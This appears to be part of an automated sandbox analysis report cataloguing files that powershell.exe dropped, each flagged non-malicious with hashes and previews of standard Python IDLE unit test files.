                              Category:dropped
                              Size (bytes):899
                              Entropy (8bit):4.682997045608694
                              Encrypted:false
                              SSDEEP:12:XcJhT86rRpH7CkLeQiuRjrzGpjQC79arSNqJ84Xj4mRVHGSPyWyTn4oQzK02aLJv:yNrrbjLeHuQEm6vMmRVmrWy/8Yal
                              MD5:2EC562890FEC5BB4A7C2270679F0FD8E
                              SHA1:7CE03B4B43ABCDDBEB849D92EFE90ECCC2535134
                              SHA-256:DECABF0433C50B63C75FE01CF5FC690C59DFBFDBCACF4A9D6411D90C8D57061F
                              SHA-512:9D1300A25DA6F733F010ABF405F513123AFA362F3EEBD9913C817A1F8DCB13A1801E9B122784C472147D49E8091390689D67812549E2F3ADD4A470327D9222EB
                              Malicious:false
                              Preview:"Test help, coverage 94%."....from idlelib import help..import unittest..from test.support import requires..requires('gui')..from os.path import abspath, dirname, join..from tkinter import Tk......class IdleDocTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. "By itself, this tests that file parsed without exception.".. cls.root = root = Tk().. root.withdraw().. cls.window = help.show_idlehelp(root).... @classmethod.. def tearDownClass(cls):.. del cls.window.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.... def test_1window(self):.. self.assertIn('IDLE Doc', self.window.wm_title()).... def test_4text(self):.. text = self.window.frame.text.. self.assertEqual(text.get('1.0', '1.end'), ' IDLE ')......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6086
                              Entropy (8bit):4.55696386160225
                              Encrypted:false
                              SSDEEP:96:J7rlIC4hu+xQ7l2x2Ju+vJK+RqjP+kQZc+xQav4slNg/KzftFTthFk:l2yp2x2JlJfRqjGZZnyav4slNg/KLtFa
                              MD5:C323A6F1EF88CC944481662B15B3316D
                              SHA1:C1E521966C6B6A7E8C323BA88EB6C7EE5286C90A
                              SHA-256:7E528FA30564A319C9524E13F18BF8E08115888C0E1B182096C9E1D0DCE49CDD
                              SHA-512:EAB5A0FCF5FD26D52EB28DD1C1268193E332A5F2D13A958EAB40696F95EDB9B7B125EBE7452C5566982D729C761F233197B53B4ECD90AF917472C2206042B8FE
                              Malicious:false
                              Preview:"""Test help_about, coverage 100%...help_about.build_bits branches on sys.platform='darwin'...'100% combines coverage on Mac and others..."""....from idlelib import help_about..import unittest..from test.support import requires, findfile..from tkinter import Tk, TclError..from idlelib.idle_test.mock_idle import Func..from idlelib.idle_test.mock_tk import Mbox_func..from idlelib import textview..import os.path..from platform import python_version....About = help_about.AboutDialog......class LiveDialogTest(unittest.TestCase):.. """Simulate user clicking buttons other than [Close]..... Test that invoked textview has text from source... """.. @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.dialog = About(cls.root, 'About IDLE', _utest=True).... @classmethod.. def tearDownClass(cls):.. del cls.dialog.. cls.root.update_idletasks().. cls.root.destroy().. del cls.roo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5689
                              Entropy (8bit):4.567228448118011
                              Encrypted:false
                              SSDEEP:96:JMrVrn2q8dncVlzSW6icywXGCyCsC3f/wgj32b+eaK2Enf:w0qJvz8hywd5/wgr2Ke6Enf
                              MD5:E0E7DEBE6E58F6AC0A93B3F077B57911
                              SHA1:A2AE702EEAE60969FC2D2A062C1961E5527C6A1B
                              SHA-256:CAC6C984CE34456D4AEFFF5721B8D4C6FBE76286BFBBEF8DDACF61D5D36071B7
                              SHA-512:B70D9577723770CE25444410CAF850AD1883B3D5E8C5190F48973DA49611C87EAFBEFF42F0B58E012D9DD28251FFF152A15220BF445A61EAC12EE2ACFFA5F0F3
                              Malicious:false
                              Preview:" Test history, coverage 100%."....from idlelib.history import History..import unittest..from test.support import requires....import tkinter as tk..from tkinter import Text as tkText..from idlelib.idle_test.mock_tk import Text as mkText..from idlelib.config import idleConf....line1 = 'a = 7'..line2 = 'b = a'......class StoreTest(unittest.TestCase):.. '''Tests History.__init__ and History.store with mock Text'''.... @classmethod.. def setUpClass(cls):.. cls.text = mkText().. cls.history = History(cls.text).... def tearDown(self):.. self.text.delete('1.0', 'end').. self.history.history = [].... def test_init(self):.. self.assertIs(self.history.text, self.text).. self.assertEqual(self.history.history, []).. self.assertIsNone(self.history.prefix).. self.assertIsNone(self.history.pointer).. self.assertEqual(self.history.cyclic,.. idleConf.GetOption("main", "History", "cyclic", 1, "bool")).... de
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):9358
                              Entropy (8bit):4.580916372746426
                              Encrypted:false
                              SSDEEP:96:+mrI0JOltNzx1MG9OcInDjbkscMjsk9ej0/+k2tRMpkm/7eqz92aO2k:nI7NVOTnDjbklMjvwj0/FOq/78V2k
                              MD5:A0175297E64A1D8BC5B68461F6A8BA74
                              SHA1:8B50F7A754DED3B9836DDB552728D39902E99A9E
                              SHA-256:166421C087BDACE4BBF6CB1FD8B8BBA986B0DFB485762521C9A7AE5618EDC166
                              SHA-512:1138DD122E3D3C9096710608756CB4F493E8D107AF8DA372EC3BB5FB37DAA81D6F562106882309BEEDC316CBF01B95F1CB887C5D2835D72C2ACF19E55136554F
                              Malicious:false
                              Preview:"Test hyperparser, coverage 98%."....from idlelib.hyperparser import HyperParser..import unittest..from test.support import requires..from tkinter import Tk, Text..from idlelib.editor import EditorWindow....class DummyEditwin:.. def __init__(self, text):.. self.text = text.. self.indentwidth = 8.. self.tabwidth = 8.. self.prompt_last_line = '>>>'.. self.num_context_lines = 50, 500, 1000.... _build_char_in_string_func = EditorWindow._build_char_in_string_func.. is_char_in_string = EditorWindow.is_char_in_string......class HyperParserTest(unittest.TestCase):.. code = (.. '"""This is a module docstring"""\n'.. '# this line is a comment\n'.. 'x = "this is a string"\n'.. "y = 'this is also a string'\n".. 'l = [i for i in range(10)]\n'.. 'm = [py*py for # comment\n'.. ' py in l]\n'.. 'x.__len__\n'.. "z = ((r'asdf')+('a')))\n".. '[x
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2541
                              Entropy (8bit):4.57390880549985
                              Encrypted:false
                              SSDEEP:48:q1lrIXJYhp4cgMfhQXMBBodwxtbHmoRCsqQB4eRND5zvtR4O1al:q1lrIXJmp4cvfhQddwxF/4zuNDJtG2k
                              MD5:E3653EDDA57FF76A040338D328D61ED4
                              SHA1:57B1579C715F9F2ED7BB1EF53963890BE48F6694
                              SHA-256:14C80A566031A8AED6A781755BD6D8BD6B08F5200C16A8495EA4CCD55121EF0C
                              SHA-512:CA9F69AB812853292E7CDE16751CAC1D1E26AFE4C1958840100D4C24D60760B90244FC202A9A098C569EAE1D4C323778346B12C21ABE2AD501E9131F99588186
                              Malicious:false
                              Preview:"Test , coverage 17%."....from idlelib import iomenu..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow..from idlelib import util..from idlelib.idle_test.mock_idle import Func....# Fail if either tokenize.open and t.detect_encoding does not exist...# These are used in loadfile and encode...# Also used in pyshell.MI.execfile and runscript.tabnanny...from tokenize import open, detect_encoding..# Remove when we have proper tests that use both.......class IOBindingTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.editwin = EditorWindow(root=cls.root).. cls.io = iomenu.IOBinding(cls.editwin).... @classmethod.. def tearDownClass(cls):.. cls.io.close().. cls.editwin._close().. del cls.editwin.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3557
                              Entropy (8bit):4.497249719970759
                              Encrypted:false
                              SSDEEP:96:Ed1rgtFgplN6Yd1qBxsM9cTHjlvAD/NDHeVRk:EPfLN6YTqBiM9cTHJvAD/NDHeXk
                              MD5:BF484DD8323544B5D452993F81273C79
                              SHA1:47C053467A099C0456EE238F2EA1FD73F2EFF067
                              SHA-256:6FBEE21ADEF8F95F9BE575F6058322D66A66775924AE594F0D9FA2E98D8D688F
                              SHA-512:BE154040BF0AE7F076C2B04D4C509DBEFCAEEA784996F31119308B421D79E7481C9935CF538C84C66111381BAFC0EFCF88931FE058D689A45AACECF831135424
                              Malicious:false
                              Preview:"Test macosx, coverage 45% on Windows."....from idlelib import macosx..import unittest..from test.support import requires..import tkinter as tk..import unittest.mock as mock..from idlelib.filelist import FileList....mactypes = {'carbon', 'cocoa', 'xquartz'}..nontypes = {'other'}..alltypes = mactypes | nontypes......def setUpModule():.. global orig_tktype.. orig_tktype = macosx._tk_type......def tearDownModule():.. macosx._tk_type = orig_tktype......class InitTktypeTest(unittest.TestCase):.. "Test _init_tk_type.".... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = tk.Tk().. cls.root.withdraw().. cls.orig_platform = macosx.platform.... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. cls.root.destroy().. del cls.root.. macosx.platform = cls.orig_platform.... def test_init_sets_tktype(self):.. "Test that _init_tk_type sets _tk_type according to platform."..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1680
                              Entropy (8bit):4.379173964804139
                              Encrypted:false
                              SSDEEP:24:irPDqqy6Hcrib8swg0pG0IfyIrFHkRgal:irPDqqDH5bXwg000IKIhHkgal
                              MD5:B117A570858CB6C08AD7D14D5C25F605
                              SHA1:9F6FAE2C3504E1E428C127E3C458605614AF946F
                              SHA-256:E3C6BFCCC93C9C0469BB6EAD80EE552699871AB85ECFD3002241DAE936CA7BB6
                              SHA-512:B500B7D22E84376FEC28AB7E7C4AAB714BBE6F026968A110382151CAC94924A65D1736679401A970204A1A3600E41B15F287CF95B5476534204F5738F65E7EB8
                              Malicious:false
                              Preview:"Test mainmenu, coverage 100%."..# Reported as 88%; mocking turtledemo absence would have no point.....from idlelib import mainmenu..import re..import unittest......class MainMenuTest(unittest.TestCase):.... def test_menudefs(self):.. actual = [item[0] for item in mainmenu.menudefs].. expect = ['file', 'edit', 'format', 'run', 'shell',.. 'debug', 'options', 'window', 'help'].. self.assertEqual(actual, expect).... def test_default_keydefs(self):.. self.assertGreaterEqual(len(mainmenu.default_keydefs), 50).... def test_tcl_indexes(self):.. # Test tcl patterns used to find menuitem to alter... # On failure, change pattern here and in function(s)... # Patterns here have '.*' for re instead of '*' for tcl... for menu, pattern in (.. ('debug', '.*tack.*iewer'), # PyShell.debug_menu_postcommand.. ('options', '.*ode.*ontext'), # EW.__init__, CodeContext.toggle..... ('options', '
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1365
                              Entropy (8bit):4.5603243299598475
                              Encrypted:false
                              SSDEEP:24:jggJlrIB7zgGMSU25KmyHckwVOORWcQhVZal:j1JlrIBXjqckwVPYcQhVZal
                              MD5:320F0D0C1BFE5CB13AD808C29AAFE634
                              SHA1:EEFCD010BA1C91CEF904439CF11D2B6F58074825
                              SHA-256:8B3A166FD7EDD5DA37F5FA2E7D078BAC71CF8A2D6BB51DF17878FEEBD1C5EF7E
                              SHA-512:F620C49F65B65E9EE5E0A515E8310DB9D36B0DD8C94BAE5357D8AE7BC1DB2C9F941857E2449F69A08765392FA0A99C30972EA651698672CE16ACBD925BC9255B
                              Malicious:false
                              Preview:"Test multicall, coverage 33%."....from idlelib import multicall..import unittest..from test.support import requires..from tkinter import Tk, Text......class MultiCallTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.mc = multicall.MultiCallCreator(Text).... @classmethod.. def tearDownClass(cls):.. del cls.mc.. cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_creator(self):.. mc = self.mc.. self.assertIs(multicall._multicall_dict[Text], mc).. self.assertTrue(issubclass(mc, Text)).. mc2 = multicall.MultiCallCreator(Text).. self.assertIs(mc, mc2).... def test_init(self):.. mctext = self.mc(self.root).. self.assertIsInstance(mctext._MultiCall
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5583
                              Entropy (8bit):4.543987072851069
                              Encrypted:false
                              SSDEEP:96:LnirI04CKX3yK3Fz7F9D/cvDG8bGEP/i17fkB9yjPuB4k:rAaZ3tZt/cblJi1jkB9yjE4k
                              MD5:A5E7531382C9BD9C0640EB183F9EA02F
                              SHA1:12C8F4629FD8ECC4C76606AF02F53223FBD9F09D
                              SHA-256:31C1E56158DC7BBFAAB81937FEA7373CE99282FBB64CDD2386D749F3ED1D6595
                              SHA-512:23E630FABD8CF8EB0E9FAE2F9865EFE9E1CB812E3E5F811B0A2765B25A8BC9369C0DFAC59EEA47C2FB845A50852E25780FDD8BA022A3E2C9ABE768A3DB33EA31
                              Malicious:false
                              Preview:"Test outwin, coverage 76%."....from idlelib import outwin..import unittest..from test.support import requires..from tkinter import Tk, Text..from idlelib.idle_test.mock_tk import Mbox_func..from idlelib.idle_test.mock_idle import Func..from unittest import mock......class OutputWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. root = cls.root = Tk().. root.withdraw().. w = cls.window = outwin.OutputWindow(None, None, None, root).. cls.text = w.text = Text(root).... @classmethod.. def tearDownClass(cls):.. cls.window.close().. del cls.text, cls.window.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.text.delete('1.0', 'end').... def test_ispythonsource(self):.. # OutputWindow overrides ispythonsource to always return False... w = self.window.. self.assertFalse(w.ispythonsource('test.txt')).. self.assertFalse(w.ispyth
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):3656
                              Entropy (8bit):4.456325977318014
                              Encrypted:false
                              SSDEEP:96:RcK/BR/srfODplCEfVCEc846T1oCt3Oit7qZ/CPqk:RcKJRWmhfVj46T1oCt3rUZ/CPqk
                              MD5:017C85E53B01C0002E6C963406E44E0F
                              SHA1:171AB9C80CBEA0E33E4E22C59FAE84CC47D5DEFF
                              SHA-256:D41411DFE26AFE7F3302029333C7C9B896ABFE96E68EC991DF6EBB61DAFF408F
                              SHA-512:8FEF530BE8BABB03BEDF4412D3A7D71ADE333D02219EAA15B0391EBDC26A2994A0416179BFE74EC3ACE51D4AFDE95BA3EC55008949724C7628DA62B071DE9024
                              Malicious:false
                              Preview:"""Test parenmatch, coverage 91%.....This must currently be a gui test because ParenMatch methods use..several text methods not defined on idlelib.idle_test.mock_tk.Text..."""..from idlelib.parenmatch import ParenMatch..from test.support import requires..requires('gui')....import unittest..from unittest.mock import Mock..from tkinter import Tk, Text......class DummyEditwin:.. def __init__(self, text):.. self.text = text.. self.indentwidth = 8.. self.tabwidth = 8.. self.prompt_last_line = '>>>' # Currently not used by parenmatch.......class ParenMatchTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).. cls.editwin = DummyEditwin(cls.text).. cls.editwin.text_frame = Mock().... @classmethod.. def tearDownClass(cls):.. del cls.text, cls.editwin.. cls.root.update_idletasks().. cls.root.destroy().. del cls.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):2508
                              Entropy (8bit):4.66766218107638
                              Encrypted:false
                              SSDEEP:48:PBrISq5Qh7XqFYLPwhFWHdrVIqYZPtdbBqvbnMNlpNIVgab:PBrISq5Qh7OYKlTIGC
                              MD5:CEADEED30F1A4566330E1742AFCB0635
                              SHA1:0736B3473DA9E07E31C8C2521C9C555FE88C714F
                              SHA-256:7396A4069A03423F2C6C5AD62D92C742D17DF0E3F2E7F66839FF111958ED1BF1
                              SHA-512:0548C466B4F2153D36C06C29D6E3755B59B82E9B66ADC940D56D0BC68E35067612B47BFA8C5040929059BB98796A55FD341A74E0D53217259EE4949DA81D0A2E
                              Malicious:false
                              Preview:"Test pathbrowser, coverage 95%."....from idlelib import pathbrowser..import unittest..from test.support import requires..from tkinter import Tk....import os.path..import pyclbr # for _modules..import sys # for sys.path....from idlelib.idle_test.mock_idle import Func..import idlelib # for __file__..from idlelib import browser..from idlelib.tree import TreeNode......class PathBrowserTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.pb = pathbrowser.PathBrowser(cls.root, _utest=True).... @classmethod.. def tearDownClass(cls):.. cls.pb.close().. cls.root.update_idletasks().. cls.root.destroy().. del cls.root, cls.pb.... def test_init(self):.. pb = self.pb.. eq = self.assertEqual.. eq(pb.master, self.root).. eq(pyclbr._modules, {}).. self.assertIsInstance(pb.node, TreeNode).. self.assertIsNotNone(b
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4183
                              Entropy (8bit):4.495927423981778
                              Encrypted:false
                              SSDEEP:96:ATrfLFyYvd4GGUmcYmIjDEtTlxgg7Xbt92LxFKjk:85BxuGXD2LLKjk
                              MD5:63576CF82D16BC8FE9A2DFED627956D1
                              SHA1:0AA75CFAD63E6B2C2729881F73909690DA36C5BD
                              SHA-256:348ED04617A2937915B9C594792D5DBDB3EDAC826380DA206FD54FF1ABC556B5
                              SHA-512:8CCE6DB2F08F1DFF465D82C13DBD7EEB826D235CF026C7CBA3F71C2AEC8A98847A8FD0E40E211ADE030EF499DABAE1A57BC56ED984771CEC67B7746EB51451A7
                              Malicious:false
                              Preview:"Test percolator, coverage 100%."....from idlelib.percolator import Percolator, Delegator..import unittest..from test.support import requires..requires('gui')..from tkinter import Text, Tk, END......class MyFilter(Delegator):.. def __init__(self):.. Delegator.__init__(self, None).... def insert(self, *args):.. self.insert_called_with = args.. self.delegate.insert(*args).... def delete(self, *args):.. self.delete_called_with = args.. self.delegate.delete(*args).... def uppercase_insert(self, index, chars, tags=None):.. chars = chars.upper().. self.delegate.insert(index, chars).... def lowercase_insert(self, index, chars, tags=None):.. chars = chars.lower().. self.delegate.insert(index, chars).... def dont_insert(self, index, chars, tags=None):.. pass......class PercolatorTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.text = Text(cls.root).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):19848
                              Entropy (8bit):4.374072305945841
                              Encrypted:false
                              SSDEEP:384:S3SlrdYdM21WBfAtuS7Nq1gaz1m+ZMRfG:XGyBfAtnNqkRfG
                              MD5:FA8A1DD6FE8BD377B135BB048D0E2440
                              SHA1:3AFC0C73B818EB3D959FD9EC5463BD9F829DF4D9
                              SHA-256:232FE6760557664952185C669A444C0E16042FA28BE2D293D595214E011562A7
                              SHA-512:6C6B9F2234023C85634CC304EEC2A628A759AC4D177D485001297967E04F76A6B963663CF5DA270920F5501BCA9676357F2439DB05F9F73D4EB49EDFEC444101
                              Malicious:false
                              Preview:"Test pyparse, coverage 96%."....from idlelib import pyparse..import unittest..from collections import namedtuple......class ParseMapTest(unittest.TestCase):.... def test_parsemap(self):.. keepwhite = {ord(c): ord(c) for c in ' \t\n\r'}.. mapping = pyparse.ParseMap(keepwhite).. self.assertEqual(mapping[ord('\t')], ord('\t')).. self.assertEqual(mapping[ord('a')], ord('x')).. self.assertEqual(mapping[1000], ord('x')).... def test_trans(self):.. # trans is the production instance of ParseMap, used in _study1.. parser = pyparse.Parser(4, 4).. self.assertEqual('\t a([{b}])b"c\'d\n'.translate(pyparse.trans),.. 'xxx(((x)))x"x\'x\n')......class PyParseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.parser = pyparse.Parser(indentwidth=4, tabwidth=4).... @classmethod.. def tearDownClass(cls):.. del cls.parser.... def test_init(self):.. self.assertEqual(
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):5113
                              Entropy (8bit):4.646725736531097
                              Encrypted:false
                              SSDEEP:96:5dDrIrW2aW/KGiMCYhAZ51x5p5NEBqb7clNjNR3ZNqE/Xbjab57O8k:590anGiMthAZ51x5p5NEBqb7clNjNR3v
                              MD5:6016EC47319908CA883766932B6E8370
                              SHA1:77A1F96DCDCAC4DAA1DD10A20877F2948403F11F
                              SHA-256:E42604612BB73083E184CD79801B2EE7A24DD11F0BE0242E88B7CFE0F392B7EE
                              SHA-512:0C43ED9689E729CBE2770286B91D4C19CBCD214BA01D79F7491D3D337E0FAB480F66C62C384AE05CBFE44B73E027E9CA45F98AD4E0A6989CE4366EAAFAB7D40E
                              Malicious:false
                              Preview:"Test pyshell, coverage 12%."..# Plus coverage of test_warning. Was 20% with test_openshell.....from idlelib import pyshell..import unittest..from test.support import requires..from tkinter import Tk......class FunctionTest(unittest.TestCase):.. # Test stand-alone module level non-gui functions..... def test_restart_line_wide(self):.. eq = self.assertEqual.. for file, mul, extra in (('', 22, ''), ('finame', 21, '=')):.. width = 60.. bar = mul * '='.. with self.subTest(file=file, bar=bar):.. file = file or 'Shell'.. line = pyshell.restart_line(width, file).. eq(len(line), width).. eq(line, f"{bar+extra} RESTART: {file} {bar}").... def test_restart_line_narrow(self):.. expect, taglen = "= RESTART: Shell", 16.. for width in (taglen-1, taglen, taglen+1):.. with self.subTest(width=width):.. self.assertEqual(pyshell.restart_line(width, '
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):15905
                              Entropy (8bit):4.65685275514465
                              Encrypted:false
                              SSDEEP:192:VyVGFv7ZCbTjx4hs8+JmvYP2axRsgmmwqd/mmauq9O8dafo7+HZ5FXMyKXPGHXsz:kVGhVCb533lvGWHZ5G8c/1gmhpI/kFhp
                              MD5:3D7F5D30CC6AEFAAF0A69FBB3D190178
                              SHA1:1B659188CC80E4BC212A3C90E8E6CFD2DCDC2132
                              SHA-256:18C9E88B30136AB683DAE039DAE45E6BBAAE36F046CFD3A0A6A6CB8F278C2C89
                              SHA-512:5C957544557CB3BFBA9C46C0A595252474C35A4234879C9C68207480BED31135AB31E28835609BE909B902D4368605F7C7FCA5CD82FFB43C5CA2D1005BA564E5
                              Malicious:false
                              Preview:"""Test query, coverage 93%.....Non-gui tests for Query, SectionName, ModuleName, and HelpSource use..dummy versions that extract the non-gui methods and add other needed..attributes. GUI tests create an instance of each class and simulate..entries and button clicks. Subclass tests only target the new code in..the subclass definition.....The appearance of the widgets is checked by the Query and..HelpSource htests. These are run by running query.py..."""..from idlelib import query..import unittest..from test.support import requires..from tkinter import Tk, END....import sys..from unittest import mock..from idlelib.idle_test.mock_tk import Var......# NON-GUI TESTS....class QueryTest(unittest.TestCase):.. "Test Query base class.".... class Dummy_Query:.. # Test the following Query methods... entry_ok = query.Query.entry_ok.. ok = query.Query.ok.. cancel = query.Query.cancel.. # Add attributes and initialization needed for tests... def __i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4298
                              Entropy (8bit):4.55533292909318
                              Encrypted:false
                              SSDEEP:96:CSrIHitHR05vMluK9IsurJo8agTCcs3nxkja9q1ZMAk:LDRSvMlu0InrJo8agTVoxkja9MHk
                              MD5:4FD9C7E842E0FDBC4DDBCA1149080C46
                              SHA1:A8C49EE6CECB6B7113B51D37C3E2EFF78943B6A4
                              SHA-256:A44739A76B90077C3649192293FBCA7159CBA8A0FC88C6C09E39A92A565BDC58
                              SHA-512:8F7D2E5BDD577A59E66C0D0DAA5FA38320A7CE87640FCCD11C395CA114521A7C0D434E5EFC8CE3FECAA40C5E8B54726FF7869E98ADD77EE287ED8C6C29BF954E
                              Malicious:false
                              Preview:"Test redirector, coverage 100%."....from idlelib.redirector import WidgetRedirector..import unittest..from test.support import requires..from tkinter import Tk, Text, TclError..from idlelib.idle_test.mock_idle import Func......class InitCloseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).... @classmethod.. def tearDownClass(cls):.. del cls.text.. cls.root.destroy().. del cls.root.... def test_init(self):.. redir = WidgetRedirector(self.text).. self.assertEqual(redir.widget, self.text).. self.assertEqual(redir.tk, self.text.tk).. self.assertRaises(TclError, WidgetRedirector, self.text).. redir.close() # restore self.tk, self.text.... def test_close(self):.. redir = WidgetRedirector(self.text).. redir.register('insert', Func).. redir.close().. self.assertE
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8593
                              Entropy (8bit):4.439568328388032
                              Encrypted:false
                              SSDEEP:192:smVhY8Ud8/WhxPT0ai1PI9cbPXPVPPUu+PZ7ejVQLJDk:sfdDjPThi1PI9cbPXPVPcu+PxejYJw
                              MD5:646DC5C35073018DA41B1630C41DF4A2
                              SHA1:F384A4872F77CF31BE0D471DF8B12037E358C4C7
                              SHA-256:A39710F9F13103BCE5E9A31A4C968F26F77943E886A21EC8DB385911CF6AA959
                              SHA-512:6C8A05D793796DB678C34FF8174AB73FB70B6D6FA4EA92956686A43BCB61655232D937AFA00572BBE651C0F65BDAAC92A92376DD5478A44E14C489FFA98D09E7
                              Malicious:false
                              Preview:"Test replace, coverage 78%."....from idlelib.replace import ReplaceDialog..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, Text....from unittest.mock import Mock..from idlelib.idle_test.mock_tk import Mbox..import idlelib.searchengine as se....orig_mbox = se.messagebox..showerror = Mbox.showerror......class ReplaceDialogTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().. se.messagebox = Mbox.. cls.engine = se.SearchEngine(cls.root).. cls.dialog = ReplaceDialog(cls.root, cls.engine).. cls.dialog.bell = lambda: None.. cls.dialog.ok = Mock().. cls.text = Text(cls.root).. cls.text.undo_block_start = Mock().. cls.text.undo_block_stop = Mock().. cls.dialog.text = cls.text.... @classmethod.. def tearDownClass(cls):.. se.messagebox = orig_mbox.. del cls.text, cls.dialog, cls.engine.. cl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):834
                              Entropy (8bit):4.589054047199901
                              Encrypted:false
                              SSDEEP:12:urShTnecjLUeirwHdKM5Jkc3+01x7nEKdq23ZrWmQO/QJKssJkcC46ry02aLJv:urSdeqUy9KM/kC+IxY673ZCY1sgkTQal
                              MD5:E5126FFAAC83318469D687670470B909
                              SHA1:EF8832CC7E2C94BE276B598456E654E3441361DC
                              SHA-256:38E3BB1648CAB509BE226A34405F1BB6FB477EA215BF1121E08C745469FB9A0F
                              SHA-512:89B900D67685CC8573FBDCFF08A09BB3B9464DD6851594643A919783CF53688843BA0C618989CA54582ED098DC31BB494235E30AE7CA52E3E6EFC46D6902813D
                              Malicious:false
                              Preview:"Test rpc, coverage 20%."....from idlelib import rpc..import unittest........class CodePicklerTest(unittest.TestCase):.... def test_pickle_unpickle(self):.. def f(): return a + b + c.. func, (cbytes,) = rpc.pickle_code(f.__code__).. self.assertIs(func, rpc.unpickle_code).. self.assertIn(b'test_rpc.py', cbytes).. code = rpc.unpickle_code(cbytes).. self.assertEqual(code.co_names, ('a', 'b', 'c')).... def test_code_pickler(self):.. self.assertIn(type((lambda:None).__code__),.. rpc.CodePickler.dispatch_table).... def test_dumps(self):.. def f(): pass.. # The main test here is that pickling code does not raise... self.assertIn(b'test_rpc.py', rpc.dumps(f.__code__))......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16186
                              Entropy (8bit):4.624998372220666
                              Encrypted:false
                              SSDEEP:384:rlrmvdTCadwRyRdHPUieDdMTphfV3/HRiWF0mZHrUfzEPMbBe:rlqBNvUieDdMTphfV3/HRiWF5
                              MD5:14A59C57774004E153D6CE98DE85BD00
                              SHA1:F8DC344FDCDA82137BF2228C13E1EA466F676593
                              SHA-256:A626E21BC2E4A716B002F7AFE60A28222FB515A09258B5140159957AA69B385B
                              SHA-512:A184604E12B04D913FACA32F2312B7A17768A15722A26D19EA4834E538A862AB18B82D56104C87F9493D8338056D7A8E05C8291D4D67F8B43F2E74C402985874
                              Malicious:false
